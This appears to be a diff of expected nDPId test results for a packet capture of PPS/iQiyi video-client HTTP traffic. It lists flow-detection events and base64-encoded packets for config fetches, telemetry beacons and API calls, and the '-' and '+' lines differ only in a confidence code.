01040{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1467353191505,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":493,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":493,"pkt_l4_len":459,"thread_ts_msec":1467353191505,"pkt":"ABxCjnAxTF4M6gNlCABFAAHfpuJAADgGHVffGmoUwKhzCABQxk5hkIgmlBGBclAYAB+\/UwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogOTgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkV4cGlyZXM6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MTI6MTAgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KWC1DYWNoZTogSElUIGZyb20gMTAuMTIxLjMzLjk3DQpYLUNhY2hlOiBISVQgZnJvbSAyMjMuMjYuMTA2LjIwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQpbbWFzZmxhZ10NCnY9Mg0KcD00MA0KZT2xsb6pL8nPuqMNCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1467353191521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191521,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9RAAIAGTYzAqHMI3xpqFMZPAFCekgJEnvl6klAYQTcvHQAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2F1dG8uaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2F1dG9fcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masauto.ini","code":0,"content_type":"","user_agent":"masauto_runxx"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masauto.ini","code":0,"content_type":"","user_agent":"masauto_runxx"}} 01086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1467353191524,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"thread_ts_msec":1467353191524,"pkt":"ABxCjnAxTF4M6gNlCABFAAIAVHFAADgGb6ffGmoUwKhzCABQxk+e+XqSnpIC1FAYAB\/e1QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjUwOjIzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4yMA0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW21hc2F1dG9dDQp2PTENCnA9MQ0KZT2xsb6pL8nPuqMvuePW3S\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7580000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1467353191538,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1467353191538,"pkt":"TF4M6gNlABxCjnAxCABFAAD6L9ZAAIAGlfnAqHMIJG7cD8ZNAFCivUMktEgQ8FAY\/\/DARAAAR0VUIC90bXBzdGF0cy5naWY\/bWV0aG9kPXFpdWJpdGVyJm9zPXdpbmRvd3MtNi4xLjc2MDFfc3AxJnV1aWQ9MzUwQzNGMUFDNzVENDBiYzkwRDYwMkRBNEU2N0E3MkQmc29mdHZlcnNpb249MS4wLjAuMSZzb3VyY2U9cHBzJnRhc2t0eXBlPWdldHRhc2tpbmZvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRSVlpQW5nZW50DQpIb3N0OiBtc2cudmlkZW8ucWl5aS5jb20NCg0K"} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7580000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?method=qiubiter&os=windows-6.1.7601_sp1&uuid=350C3F1AC75D40bc90D602DA4E67A72D&softversion=1.0.0.1&source=pps&tasktype=gettaskinfo","code":0,"content_type":"","user_agent":"QIYiAngent"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7580000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?method=qiubiter&os=windows-6.1.7601_sp1&uuid=350C3F1AC75D40bc90D602DA4E67A72D&softversion=1.0.0.1&source=pps&tasktype=gettaskinfo","code":0,"content_type":"","user_agent":"QIYiAngent"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1467353191556,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353191556,"pkt":"TF4M6gNlABxCjnAxCABFAAC5L9hAAIAGTYfAqHMI3xpqFMZPAFCekgLUnvl8alAYQMHSJwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc3JlY29tLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBtYXNhdXRvX3J1bnh4DQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1467353191604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191604,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L+lAAIAGTXjAqHMI3xpqE8ZQAFAEnujgm7SOJVAYQTfnOwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2Jsb2cuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2Jsb2dfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masblog.ini","code":0,"content_type":"","user_agent":"masblog_runxx"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masblog.ini","code":0,"content_type":"","user_agent":"masblog_runxx"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1467353191606,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353191606,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5GMJAAC4G\/04kbtwPwKhzCABQxk20SBDwor1D9lAYPLgN5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 01085{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1467353191608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"thread_ts_msec":1467353191608,"pkt":"ABxCjnAxTF4M6gNlCABFAAIApFFAADgGH8jfGmoTwKhzCABQxlCbtI4lBJ7pcFAYAB996wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjE3OjQzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW21hc2Jsb2ddDQp2PTENCnA9MQ0KZT2xsb6pL8nPuqMvuePW3S\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7580000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01190{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1467353191688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":604,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":604,"pkt_l4_len":570,"thread_ts_msec":1467353191688,"pkt":"TF4M6gNlABxCjnAxCABFAAJOL\/RAAIAGZxbAqHMIZePIC8ZRAFCkQ4vBOJoXClAY\/\/Dn4QAAR0VUIC9jY3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IENvb2tpZUNsZWFyX3J1bnh4DQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFXSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25Kc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7580000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/ccs","code":0,"content_type":"","user_agent":"CookieClear_runxx"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7580000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/ccs","code":0,"content_type":"","user_agent":"CookieClear_runxx"}} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1467353191722,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":291,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":291,"pkt_l4_len":257,"thread_ts_msec":1467353191722,"pkt":"ABxCjnAxTF4M6gNlCABFAAEVyyVAAC8GHh5l48gLwKhzCABQxlE4mhcKpEON51AYPCgsNwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2pzb247IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAxMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCnsiciI6ZmFsc2V9"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1467353192820,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353192820,"pkt":"AQBef\/\/6SNIkYwreCABFAAChDkwAAAER9TTAqAUp7\/\/\/+sTGB2wAjdbrTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1437,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1467353193179,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353193179,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAo0AAAERAQHAqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1467353195822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353195822,"pkt":"AQBef\/\/6SNIkYwreCABFAAChDk8AAAER9THAqAUp7\/\/\/+sTGB2wAjdbrTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1467353195852,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353195852,"pkt":"TF4M6gNlABxCjnAxCABFAAOkMjBAAIAGuBrAqHMIymwO7MZTAFDqT5aSVlCsgFAYQTeESwAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxOTUwNTQmc2g9JnNxPSZzdz0mdD1zcCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 